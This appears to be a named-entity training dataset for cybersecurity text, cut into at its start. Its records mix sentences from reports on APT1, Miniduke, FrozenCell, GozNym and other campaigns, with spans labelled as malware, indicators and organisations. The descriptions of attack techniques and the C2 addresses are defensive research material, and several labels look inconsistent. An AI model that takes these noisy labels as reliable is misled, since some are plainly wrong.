APT1 has systematically stolen hundreds of terabytes of data from at least 141 organizations , and has demonstrated the capability and intent to steal from dozens of organizations simultaneously . Then , it copies the system file \u201c rundll32.exe \u201d to the same directory with name \u201c ntuser.exe \u201d and runs it with \u201c ntuser.bin \u201d as a parameter , effectively loading the malicious DLL file .", "spans": [{"start": 0, "end": 15, "label": "Malware"}, {"start": 97, "end": 115, "label": "Indicator"}, {"start": 354, "end": 358, "label": "Organization"}, {"start": 586, "end": 598, "label": "Indicator"}, {"start": 635, "end": 645, "label": "Indicator"}, {"start": 667, "end": 677, "label": "Indicator"}, {"start": 717, "end": 739, "label": "Malware"}]} {"text": "Since it becomes a part of the boot partition , formatting the device will not solve the problem . We are also grateful to the Private Office of his Holiness the Dalai Lama , the Tibetan Government-in-Exile , the missions of Tibet in London , Brussels , and New York , and Drewla ( a Tibetan NGO ) . Since 2006 , Mandiant has observed APT1 compromise 141 companies spanning 20 major industries . That DLL file is the main module of Miniduke , and it uses the URL http://twitter.com/TamicaCGerald to fetch commands .", "spans": [{"start": 225, "end": 230, "label": "Organization"}, {"start": 243, "end": 251, "label": "Organization"}, {"start": 273, "end": 279, "label": "Organization"}, {"start": 284, "end": 291, "label": "Organization"}, {"start": 292, "end": 295, "label": "Organization"}, {"start": 313, "end": 321, "label": "Organization"}, {"start": 335, "end": 339, "label": "Organization"}, {"start": 463, "end": 495, "label": "Indicator"}]} {"text": "The researchers believe that the devices somehow had the malware pre-loaded at the time of shipping from the manufacturer , or was likely distributed inside modified Android firmware . 
Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community . APT1 has a well-defined attack methodology , honed over years and designed to steal large volumes of valuable intellectual property . The web page \u201c about.htm \u201d implements an exploit for Microsoft Internet Explorer 8 .", "spans": [{"start": 166, "end": 173, "label": "System"}, {"start": 374, "end": 391, "label": "Organization"}, {"start": 394, "end": 398, "label": "Organization"}, {"start": 543, "end": 552, "label": "Indicator"}, {"start": 581, "end": 610, "label": "System"}]} {"text": "So , users should beware of certain modified Android firmware . These instances of Gh0st RAT are consistently controlled from commercial Internet access accounts located on the island of Hainan , People's Republic of China . Once APT1 has established access , they periodically revisit the victim \u2019s network over several months or years and steal broad categories of intellectual property , including technology blueprints , proprietary manufacturing processes , test results , business plans , pricing documents , partnership agreements , and emails and contact lists from victim organizations \u2019 leadership . It uses a vulnerability discovered at the end December 2012 , CVE-2012 - 4792 .", "spans": [{"start": 45, "end": 52, "label": "System"}, {"start": 83, "end": 92, "label": "System"}, {"start": 230, "end": 234, "label": "Organization"}, {"start": 544, "end": 550, "label": "System"}, {"start": 672, "end": 687, "label": "Vulnerability"}]} {"text": "Two weeks ago , Some Chinese Security Researchers have also detected a bootkit called 'Oldboot ' , possibly the same malware or another variant of it . 
The fieldwork generated extensive data that allowed us to examine Tibetan information security practices , as well as capture real-time evidence of malware that had penetrated Tibetan computer systems . APT1 uses some tools and techniques that we have not yet observed being used by other groups including two utilities designed to steal email \u2014 GETMAIL and MAPIGET . The code is also very similar to the Metasploit version of the exploit , while the payload part of the shellcode has been written by the Miniduke authors re - using the backdoor \u2019s code .", "spans": [{"start": 218, "end": 256, "label": "Organization"}, {"start": 328, "end": 335, "label": "Organization"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 490, "end": 495, "label": "System"}, {"start": 498, "end": 505, "label": "Malware"}, {"start": 510, "end": 517, "label": "Malware"}, {"start": 520, "end": 652, "label": "Indicator"}, {"start": 657, "end": 673, "label": "Organization"}]} {"text": "\" Due to the special RAM disk feature of Android devices ' boot partition , all current mobile antivirus products in the world ca n't completely remove this Trojan or effectively repair the system . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail . Establishing a foothold involves actions that ensure control of the target network \u2019s systems from outside the network . 
The Metasploit code was released on December 29 , 2012 and the vulnerability was officially fixed on January 14 , 2013 ( MS13 - 008 ) while the page with the exploit was uploaded on February 11 , 2013 .", "spans": [{"start": 41, "end": 48, "label": "System"}, {"start": 601, "end": 614, "label": "Vulnerability"}]} {"text": "'' \" According to our statistics , as of today , there 're more than 500 , 000 Android devices infected by this bootkit in China in the last six months . Where they exist , they often use grey market or pirated software . APT1 establishes a foothold once email recipients open a malicious file and a backdoor is subsequently installed . The purpose of the shellcode is to download a GIF image file from URL hxxp://[c2_hostname]/groups / pic.gif , then search for and decrypt the hidden PE file inside of it .", "spans": [{"start": 79, "end": 86, "label": "System"}, {"start": 188, "end": 199, "label": "System"}, {"start": 203, "end": 219, "label": "System"}, {"start": 222, "end": 226, "label": "Organization"}, {"start": 255, "end": 260, "label": "System"}]} {"text": "The Android malware Android.Oldboot is almost impossible to remove , not even with formatting your device . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer . A backdoor is software that allows an intruder to send commands to the system remotely .
The PE file also appeared to be a modification of the Miniduke 's main backdoor module that uses the same Twitter URL as the Java payload .", "spans": [{"start": 4, "end": 11, "label": "System"}, {"start": 20, "end": 35, "label": "Malware"}, {"start": 180, "end": 189, "label": "Malware"}, {"start": 491, "end": 523, "label": "Malware"}, {"start": 562, "end": 574, "label": "Malware"}]} {"text": "But if your device is not from a Chinese manufacturer , then the chances that you are a victim of it are very low . GhostNet represents a network of compromised computers resident in high-value political , economic , and media locations spread across numerous countries worldwide . In almost every case , APT backdoors initiate outbound connections to the intruder \u2019s \u201c command and control \u201d ( C2 ) server . We have discovered and analysed two previously unknown infection vectors that were used in the MiniDuke attacks .", "spans": [{"start": 194, "end": 203, "label": "Organization"}, {"start": 206, "end": 214, "label": "Organization"}, {"start": 221, "end": 226, "label": "Organization"}, {"start": 394, "end": 396, "label": "System"}, {"start": 503, "end": 519, "label": "Organization"}]} {"text": "This bootkit is not the first of this kind . After that , the attacker is capable of controlling the compromised device . APT intruders employ this tactic because while network firewalls are generally adept at keeping malware outside the network from initiating communication with systems inside the network , they are less reliable at keeping malware that is already inside the network from communicating to systems outside .
As previously recommended , updating Windows , Java and Adobe Reader to the latest versions should provide a basic level of defense against the known Miniduke attacks .", "spans": [{"start": 470, "end": 474, "label": "Organization"}, {"start": 479, "end": 491, "label": "System"}, {"start": 563, "end": 589, "label": "Organization"}]} {"text": "Two years back , in the month of March we reported , NQ Mobile Security Research Center uncovered the world 's first Android bootkit malware called 'DKFBootKit ' , that replaces certain boot processes and can begin running even before the system is completely booted up . The computers of diplomats , military attach\u00e9s , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT , the vast majority of the time they use what appear to be their own custom backdoors . Researchers have uncovered an ongoing cyberespionage campaign targeting more than 30 online video game companies over the past four years .", "spans": [{"start": 53, "end": 71, "label": "Organization"}, {"start": 117, "end": 124, "label": "System"}, {"start": 289, "end": 298, "label": "Organization"}, {"start": 301, "end": 318, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 342, "end": 353, "label": "Organization"}, {"start": 357, "end": 372, "label": "Organization"}, {"start": 375, "end": 386, "label": "Organization"}, {"start": 464, "end": 468, "label": "Organization"}, {"start": 533, "end": 543, "label": "Malware"}, {"start": 548, "end": 557, "label": "Malware"}, {"start": 646, "end": 657, "label": "Organization"}, {"start": 676, "end": 707, "label": "Organization"}, {"start": 731, "end": 758, "label": "Organization"}]} {"text": "But Android.Oldboot malware is a bit more dangerous because even if you remove all working components of it from 
your android successfully , the component imei_chk will persist in a protected boot memory area and hence will reinstall itself on next boot and continuously infect the Smartphone . The C&C server ( 82.137.255.56 ) used by the above backdoors was used by APT-C-27 ( Goldmouse ) many times since 2017 . We will describe APT1 \u2019s backdoors in two categories : \u201c Beachhead Backdoors \u201d and \u201c Standard Backdoors. \u201d The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": [{"start": 4, "end": 19, "label": "Malware"}, {"start": 118, "end": 125, "label": "System"}, {"start": 155, "end": 163, "label": "Indicator"}, {"start": 379, "end": 388, "label": "Organization"}, {"start": 432, "end": 436, "label": "Organization"}, {"start": 552, "end": 559, "label": "Malware"}, {"start": 589, "end": 638, "label": "Malware"}]} {"text": "Users are recommended to install apps from authorized stores such as Google Play , disable installation of apps from 'Unknown Sources ' and for a better security install a reputed security application . According to 360 Threat Intelligence Center , Goldmouse was observed deploying the nebulous njRAT backdoor . Beachhead backdoors are typically minimally featured . They 're mostly located in South East Asia , but are also in the US , Germany , Japan , China , Russia , Brazil , Peru , and Belarus , according to a release published Thursday by researchers from antivirus provider Kaspersky Lab .", "spans": [{"start": 69, "end": 80, "label": "System"}, {"start": 216, "end": 246, "label": "Organization"}, {"start": 295, "end": 309, "label": "System"}, {"start": 564, "end": 582, "label": "Organization"}, {"start": 583, "end": 596, "label": "Organization"}]} {"text": "You can also try to re-flash your device with its original ROM . 
The banking malware GozNym has legs ; only a few weeks after the hybrid Trojan was discovered , it has reportedly spread into Europe and begun plaguing banking customers in Poland with redirection attacks . They offer the attacker a toe-hold to perform simple tasks like retrieve files , gather basic system information and trigger the execution of other more significant capabilities such as a standard backdoor . The attackers work from computers with Chinese and Korean language configurations .", "spans": [{"start": 85, "end": 91, "label": "System"}, {"start": 217, "end": 234, "label": "Organization"}, {"start": 484, "end": 493, "label": "Organization"}, {"start": 504, "end": 561, "label": "System"}]} {"text": "After flashing , the bootkit will be removed . The APT group is reportedly targeting the Middle East region . APT1 \u2019s beachhead backdoors are usually what we call WEBC2 backdoors . They used their unauthorized access to obtain digital certificates that were later exploited in malware campaigns targeting other industries and political activists .", "spans": [{"start": 110, "end": 114, "label": "Organization"}, {"start": 163, "end": 178, "label": "Malware"}, {"start": 277, "end": 294, "label": "Organization"}, {"start": 311, "end": 321, "label": "Organization"}, {"start": 326, "end": 345, "label": "Organization"}]} {"text": "FrozenCell : Multi-Platform Surveillance Campaign Against Palestinians October 5 , 2017 FrozenCell has been seen masquerading as various well known social media and chat applications as well as an app likely only used by Palestinian or Jordanian students sitting their 2016 general exams . The malware has started targeting corporate , SMB , investment banking and consumer accounts at banks , including some in Portugal and the U.S. , in addition to Poland , according to researchers at IBM 's X-Force team . 
WEBC2 backdoors are probably the most well-known kind of APT1 backdoor , and are the reason why some security companies refer to APT1 as the \u201c Comment Crew. \u201d A WEBC2 backdoor is designed to retrieve a webpage from a C2 server . So far , there 's no evidence that customers of the infected game companies were targeted , although in at least one case , malicious code was accidentally installed on gamers ' computers by one of the infected victim companies .", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 88, "end": 98, "label": "Malware"}, {"start": 336, "end": 339, "label": "System"}, {"start": 342, "end": 360, "label": "Organization"}, {"start": 386, "end": 391, "label": "Organization"}, {"start": 488, "end": 502, "label": "Organization"}, {"start": 510, "end": 525, "label": "Malware"}, {"start": 567, "end": 571, "label": "Organization"}, {"start": 639, "end": 643, "label": "Organization"}, {"start": 671, "end": 685, "label": "Malware"}, {"start": 727, "end": 729, "label": "System"}, {"start": 774, "end": 814, "label": "Organization"}, {"start": 863, "end": 877, "label": "Malware"}, {"start": 908, "end": 926, "label": "Organization"}, {"start": 937, "end": 966, "label": "Organization"}]} {"text": "Lookout researchers have discovered a new mobile surveillanceware family , FrozenCell . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland . It expects the webpage to contain special HTML tags ; the backdoor will attempt to interpret the data between the tags as commands . Kaspersky said there was another case of end users being infected by the malware , which is known as \" Winnti . 
\"", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 75, "end": 85, "label": "Malware"}, {"start": 101, "end": 107, "label": "Organization"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 233, "end": 248, "label": "Organization"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 331, "end": 335, "label": "System"}, {"start": 422, "end": 431, "label": "Organization"}, {"start": 491, "end": 502, "label": "Malware"}, {"start": 525, "end": 531, "label": "Malware"}]} {"text": "The threat is likely targeting employees of various Palestinian government agencies , security services , Palestinian students , and those affiliated with the Fatah political party . With GozNym , attackers dupe users by showing them the actual bank 's URL and SSL certificate . Older versions of WEBC2 read data between HTML comments , though over time WEBC2 variants have evolved to read data contained within other types of tags . \" Having infected gaming companies that do business in MMORPG , the attackers potentially get access to millions of users , \" the researchers wrote .", "spans": [{"start": 159, "end": 164, "label": "Organization"}, {"start": 188, "end": 194, "label": "System"}, {"start": 245, "end": 249, "label": "Organization"}, {"start": 253, "end": 256, "label": "System"}, {"start": 261, "end": 276, "label": "System"}, {"start": 297, "end": 302, "label": "Malware"}, {"start": 321, "end": 325, "label": "System"}, {"start": 354, "end": 359, "label": "Malware"}, {"start": 452, "end": 468, "label": "Organization"}, {"start": 502, "end": 511, "label": "Organization"}]} {"text": "FrozenCell is the mobile component of a multi-platform attack we 've seen a threat actor known as \" Two-tailed Scorpion/APT-C-23 , '' use to spy on victims through compromised mobile devices and desktops . Fresh from targeting banks in Poland , the banking Trojan GozNym has begun taking aim at banks in Germany . 
From direct observation , we can confirm that APT1 was using WEBC2 backdoors as early as July 2006 . \" So far we do n't have data that the attackers stole from common users but we do have at least two incidents when Winnti malware had been planted on an online game update server and", "spans": [{"start": 0, "end": 10, "label": "Malware"}, {"start": 100, "end": 128, "label": "Malware"}, {"start": 227, "end": 232, "label": "Organization"}, {"start": 249, "end": 263, "label": "System"}, {"start": 264, "end": 270, "label": "System"}, {"start": 295, "end": 300, "label": "Organization"}, {"start": 360, "end": 364, "label": "Organization"}, {"start": 375, "end": 390, "label": "Malware"}, {"start": 530, "end": 544, "label": "Malware"}]} {"text": "The desktop components of this attack , previously discovered by Palo Alto Network , are known as KasperAgent and Micropsia . Attackers went on to use the Trojan to steal $4 million from 24 banks , including 22 in the United States and two in Canada , in just two weeks . However , the first compile time we have for WEBC2 is 2004-01-23 , suggesting that APT1 has been crafting WEBC2 backdoors since early 2004 . The samples we have observed seemed not to be malware targeted for the game fans but a malware module which accidentally got into [ the ] wrong place .", "spans": [{"start": 65, "end": 82, "label": "Organization"}, {"start": 98, "end": 109, "label": "Malware"}, {"start": 114, "end": 123, "label": "Malware"}, {"start": 190, "end": 195, "label": "Organization"}, {"start": 317, "end": 322, "label": "Malware"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 378, "end": 393, "label": "Malware"}, {"start": 459, "end": 466, "label": "Malware"}, {"start": 480, "end": 493, "label": "Organization"}, {"start": 498, "end": 514, "label": "Malware"}]} {"text": "We discovered 561MB of exfiltrated data from 24 compromised Android devices while investigating this threat .
Recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the GozNym group appears up to the task . Based on the 400+ samples of WEBC2 variants that we have accumulated , it appears that APT1 has direct access to developers who have continually released new WEBC2 variants for over six years . But a potential of attackers to misuse such access to infect hundreds of millions of Internet users creates a great risk . \"", "spans": [{"start": 60, "end": 67, "label": "System"}, {"start": 142, "end": 146, "label": "Organization"}, {"start": 182, "end": 188, "label": "Organization"}, {"start": 267, "end": 272, "label": "Malware"}, {"start": 325, "end": 329, "label": "Organization"}, {"start": 396, "end": 401, "label": "Malware"}, {"start": 451, "end": 460, "label": "Organization"}]} {"text": "More data is appearing daily , leading us to believe the actors are still highly active . The malware is distributed primarily through laced spam emails that lure recipients into opening attachments . WEBC2 backdoors are often packaged with spear phishing emails . Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": [{"start": 201, "end": 216, "label": "Malware"}, {"start": 256, "end": 262, "label": "System"}, {"start": 265, "end": 285, "label": "System"}, {"start": 360, "end": 388, "label": "Organization"}]} {"text": "We are continuing to watch it closely . Kessem . Once installed , APT1 intruders have the option to tell victim systems to download and execute additional malicious software of their choice . 
The cryptographic certificates have also been exploited in attacks that have hit companies in the aerospace industry .", "spans": [{"start": 40, "end": 46, "label": "Organization"}, {"start": 66, "end": 70, "label": "Organization"}, {"start": 192, "end": 222, "label": "System"}, {"start": 290, "end": 308, "label": "Organization"}]} {"text": "This threat is another proof point that attackers are clearly incorporating the mobile device into their surveillance campaigns as a primary attack vector . Fresh from targeting banks in Poland , the banking Trojan has reportedly begun taking aim at banks in Germany . WEBC2 backdoors work for their intended purpose , but they generally have fewer features than the \u201c Standard Backdoors \u201d described below . Attackers frequently abuse stolen certificates to prevent the malware they 're spreading from being detected by various security protections .", "spans": [{"start": 178, "end": 183, "label": "Organization"}, {"start": 200, "end": 214, "label": "System"}, {"start": 250, "end": 255, "label": "Organization"}, {"start": 269, "end": 284, "label": "Malware"}, {"start": 408, "end": 417, "label": "Organization"}]} {"text": "Government agencies and enterprises should look at this threat as an example of the kind of spying that is now possible given how ubiquitous mobile devices are in the workplace . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday . The standard , non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol ( to blend in with legitimate web traffic ) or a custom protocol that the malware authors designed themselves . 
In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": [{"start": 183, "end": 189, "label": "System"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 220, "end": 232, "label": "Organization"}, {"start": 252, "end": 258, "label": "Organization"}, {"start": 261, "end": 279, "label": "Organization"}, {"start": 291, "end": 294, "label": "Organization"}, {"start": 327, "end": 336, "label": "Malware"}, {"start": 337, "end": 341, "label": "Organization"}, {"start": 384, "end": 388, "label": "Indicator"}, {"start": 557, "end": 584, "label": "Organization"}]} {"text": "Attackers are keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying . The Trojan , a hybrid of Nymaim and Gozi malware , initially formed in April and thrives on carrying out redirection attacks via DNS poisoning . These backdoors give APT intruders a laundry list of ways to control victim systems . The attackers may also want to use source code stolen from the game companies so it can be deployed in rogue servers offering pirated versions of the games .", "spans": [{"start": 155, "end": 162, "label": "System"}, {"start": 237, "end": 243, "label": "System"}, {"start": 248, "end": 260, "label": "System"}, {"start": 447, "end": 456, "label": "Organization"}]} {"text": "All Lookout customers are protected from this threat . In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks . The BISCUIT backdoor ( so named for the command \u201c bdkzt \u201d ) is an illustrative example of the range of commands that APT1 has built into its \u201c standard \u201d backdoors .
Kaspersky has more here .", "spans": [{"start": 4, "end": 11, "label": "Organization"}, {"start": 181, "end": 186, "label": "Organization"}, {"start": 193, "end": 209, "label": "Malware"}, {"start": 239, "end": 244, "label": "Malware"}, {"start": 306, "end": 310, "label": "Organization"}, {"start": 355, "end": 364, "label": "Organization"}]} {"text": "What it does FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat . The method , which technically redirects users through local DNS poisoning , requires a fair bit of work ; recreating and maintaining fake bank sites can be an arduous task , but Kessem claims the group behind GozNym \u2013 Nymaim \u2013 appear up to the task . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently . Whether known as commodity malware or \u201c as - a - service , \u201d threat actors have long been turning to their fellow adversaries in the hopes of selling off their tools and opening a new stream of revenue .", "spans": [{"start": 13, "end": 23, "label": "Malware"}, {"start": 78, "end": 86, "label": "System"}, {"start": 89, "end": 97, "label": "System"}, {"start": 100, "end": 109, "label": "System"}, {"start": 112, "end": 116, "label": "System"}, {"start": 123, "end": 131, "label": "System"}, {"start": 273, "end": 277, "label": "Organization"}, {"start": 313, "end": 319, "label": "Organization"}, {"start": 344, "end": 350, "label": "System"}, {"start": 386, "end": 390, "label": "Organization"}, {"start": 422, "end": 429, "label": "Malware"}, {"start": 506, "end": 523, "label": "Malware"}, {"start": 550, "end": 563, "label": "Organization"}]} {"text": "We also detected it in apps targeted toward specific Middle Eastern demographics . Attackers behind Dyre have used similar tactics in the past but have only deployed their attacks in English speaking countries and Spain . 
Some APT backdoors attempt to mimic legitimate Internet traffic other than the HTTP protocol . The software is centrally hosted on that third - party company \u2019s servers .", "spans": [{"start": 301, "end": 305, "label": "Indicator"}, {"start": 358, "end": 390, "label": "System"}]} {"text": "For example , the actors behind FrozenCell used a spoofed app called Tawjihi 2016 , which Jordanian or Palestinian students would ordinarily use during their general secondary examination . When we last heard from the Trojan , its operators were seen launching redirection attacks on four large , U.S. banks in June . When network defenders see the communications between these backdoors and their C2 servers , they might easily dismiss them as legitimate network traffic . Think of cloud storage solutions like Dropbox or Plex , for example .", "spans": [{"start": 32, "end": 42, "label": "Malware"}, {"start": 69, "end": 81, "label": "Indicator"}, {"start": 218, "end": 224, "label": "System"}, {"start": 302, "end": 307, "label": "Organization"}, {"start": 398, "end": 400, "label": "System"}, {"start": 512, "end": 519, "label": "System"}, {"start": 523, "end": 527, "label": "System"}]} {"text": "Once installed on a device FrozenCell is capable of : Recording calls Retrieving generic phone metadata ( e.g. , cell location , mobile country code , mobile network code ) Geolocating a device Extracting SMS messages Retrieving a victim 's accounts Exfiltrating images Downloading and installing additional applications Searching for and exfiltrating pdf , doc , docx , ppt , pptx , xls , and xlsx file types Retrieving contacts The graph below represents a split of the types of data The fact that the cybercriminals behind GozNym have already adapted the Trojan for three different languages and in countries which have different banking systems is unique , according to Kessem . APT1 . 
Threat actors have been using this business model for a decade - plus , originally known as commodity malware .", "spans": [{"start": 27, "end": 37, "label": "Malware"}, {"start": 526, "end": 532, "label": "System"}, {"start": 674, "end": 680, "label": "Organization"}, {"start": 683, "end": 687, "label": "Organization"}, {"start": 690, "end": 703, "label": "Organization"}, {"start": 782, "end": 799, "label": "Malware"}]} {"text": "from only one misconfigured command and control server ( out of over 37 servers ) . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . APT1 maintains an extensive infrastructure of computers around the world . This is when threat actors create a suite of malware tools and offer them up for sale on illicit websites .", "spans": [{"start": 106, "end": 112, "label": "System"}, {"start": 156, "end": 161, "label": "Organization"}, {"start": 253, "end": 268, "label": "Organization"}, {"start": 273, "end": 296, "label": "Organization"}, {"start": 331, "end": 335, "label": "Organization"}, {"start": 419, "end": 432, "label": "Organization"}, {"start": 440, "end": 464, "label": "System"}]} {"text": "This is only a small picture of the threat actor 's operations . Seeking to tease out any possible links between Operation Aurora , VOHO , Operation DeputyDog , and Ephemeral Hydra , we began with Symantec 's Hidden Lynx report as our foundation . We have evidence suggesting that APT1 manually controls thousands of systems in support of their attacks , and have directly observed their control over hundreds of these systems . 
It can range from asking \u201c customers \u201d to pay a monthly fee for access to this set of tools to use in cyber attacks , or users can even pay the original creators to distribute the malware on their behalf and manage the infection .", "spans": [{"start": 197, "end": 205, "label": "Organization"}, {"start": 281, "end": 285, "label": "Organization"}, {"start": 531, "end": 544, "label": "Organization"}]} {"text": "Split of exfiltrated data Some noteworthy files identified in content taken from compromised devices include passport photos , audio recordings of calls , other images , and a PDF document with data on 484 individuals . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . Although they control systems in dozens of countries , their attacks originate from four large networks in Shanghai \u2014 two of which are allocated directly to the Pudong New Area , the home of Unit 61398 . Recently , this model for threat actors has come to be known as the \u201c as - a - service \" model , borrowing the term from the growing trend in the tech industry .", "spans": [{"start": 326, "end": 337, "label": "System"}, {"start": 340, "end": 356, "label": "Malware"}, {"start": 363, "end": 377, "label": "System"}, {"start": 571, "end": 581, "label": "Organization"}, {"start": 610, "end": 623, "label": "Organization"}]} {"text": "The PDF lists dates of birth , gender , passport numbers , and names . We will detail how the C&C infrastructure and tools used by hacker group Hidden Lynx during its VOHO campaign ( 2012 ) , excellently documented by Symantec researchers last September , overlap with tools used in other high profile operations during the past few years . 
The sheer number of APT1 IP addresses concentrated in these Shanghai ranges , coupled with Simplified Chinese keyboard layout settings on APT1 \u2019s attack systems , betrays the true location and language of the operators . Ransomware - as - a - service is a relatively new version of these commodity groups , such as DarkSide , known for the cyber attack in 2021 that disrupted the Colonial oil pipeline and made gas more expensive for thousands of U.S. consumers .", "spans": [{"start": 144, "end": 155, "label": "Organization"}, {"start": 218, "end": 226, "label": "Organization"}, {"start": 361, "end": 365, "label": "Organization"}, {"start": 432, "end": 459, "label": "System"}, {"start": 479, "end": 483, "label": "Organization"}, {"start": 562, "end": 591, "label": "Organization"}, {"start": 656, "end": 664, "label": "Organization"}]} {"text": "Potential targets The actors behind FrozenCell used an online service that geolocates mobile devices based on nearby cell towers to track targets . When the New York Times and Mandiant last year unmasked a large scale Chinese hacking operation , pinpointing its location down to the building , the report drew mainstream attention to what security professionals already well knew : sophisticated threat actors carry out persistent cyber operations over months and years . To help manage the vast number of systems they control , APT1 has registered hundreds of domain names , the majority of which also point to a Shanghai locale . 
But other bad actors have since adopted this business model , offering everything from command and control servers to phishing bots - as - a - service .", "spans": [{"start": 36, "end": 46, "label": "Malware"}, {"start": 157, "end": 171, "label": "Organization"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 529, "end": 533, "label": "Organization"}, {"start": 642, "end": 652, "label": "Organization"}, {"start": 719, "end": 746, "label": "System"}, {"start": 750, "end": 782, "label": "Organization"}]} {"text": "This data shows a distinct concentration of infected devices beaconing from Gaza , Palestine . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country . The domain names and IP addresses together comprise APT1 \u2019s command and control framework which they manage in concert to camouflage their true origin from their English speaking targets . There are a few reasons why attackers may opt to pay for an as - a - service malware tool for their chosen campaign : \u2022 As - a - service saves attackers time .", "spans": [{"start": 117, "end": 123, "label": "System"}, {"start": 167, "end": 172, "label": "Organization"}, {"start": 264, "end": 279, "label": "Organization"}, {"start": 284, "end": 307, "label": "Organization"}, {"start": 394, "end": 398, "label": "Organization"}, {"start": 402, "end": 421, "label": "System"}, {"start": 559, "end": 568, "label": "Organization"}, {"start": 588, "end": 620, "label": "System"}, {"start": 638, "end": 646, "label": "Organization"}]} {"text": "Map of potential targets Early samples of FrozenCell used an online service for storing geolocation information of infected devices .
Using Recorded Future , we quickly built a timeline of the reported use of those tools in major security incidents , finding many events prior to the early 2013 expos\u00e9 on Hidden Lynx . As covered in the previous \u201c Attack Lifecycle \u201d section , WEBC2 backdoor variants download and interpret data stored between tags in HTML pages as commands . When they pay for someone else \u2019s malware kit , whether it be ransomware or a phishing bot , they do n\u2019t have to invest time , money or labor to write their own malicious code or tools and instead can hop right into deploying the malware .", "spans": [{"start": 42, "end": 52, "label": "Malware"}, {"start": 305, "end": 316, "label": "Organization"}, {"start": 377, "end": 391, "label": "Malware"}, {"start": 452, "end": 456, "label": "System"}]} {"text": "Analysis of this telemetry shows infected devices are completely based in Gaza , Palestine . In particular , FireEye during the fall of 2013 called out infrastructure overlap between Ephemeral Hydra and DeputyDog . They usually download HTML pages from a system within APT1 \u2019s hop infrastructure . For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": [{"start": 109, "end": 116, "label": "Organization"}, {"start": 203, "end": 212, "label": "System"}, {"start": 237, "end": 241, "label": "System"}, {"start": 269, "end": 273, "label": "Organization"}, {"start": 306, "end": 312, "label": "Organization"}]} {"text": "It has not been confirmed whether these are from test devices or the devices of victims . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . We have observed APT1 intruders logging in to WEBC2 servers and manually editing the HTML pages that backdoors will download . 
Usually , they \u2019d have to hope a successful attack leads to a ransom payment or some sort of other financial windfall .", "spans": [{"start": 195, "end": 206, "label": "System"}, {"start": 209, "end": 225, "label": "Malware"}, {"start": 232, "end": 246, "label": "System"}, {"start": 266, "end": 270, "label": "Organization"}, {"start": 295, "end": 300, "label": "Malware"}, {"start": 334, "end": 338, "label": "System"}]} {"text": "We were also able to link the FrozenCell 's Android infrastructure to numerous desktop samples that are part of the larger multi-platform attack . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . Because the commands are usually encoded and difficult to spell from memory , APT1 intruders typically do not type these strings , but instead copy and paste them into the HTML files . Instead , they can make money by marketing their services to other bad actors for a fee .", "spans": [{"start": 30, "end": 40, "label": "Malware"}, {"start": 44, "end": 51, "label": "System"}, {"start": 147, "end": 155, "label": "Organization"}, {"start": 219, "end": 230, "label": "System"}, {"start": 235, "end": 251, "label": "Malware"}, {"start": 270, "end": 276, "label": "System"}, {"start": 286, "end": 300, "label": "Organization"}, {"start": 310, "end": 321, "label": "Organization"}, {"start": 402, "end": 406, "label": "Organization"}, {"start": 496, "end": 500, "label": "System"}]} {"text": "It appears the attackers sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . 
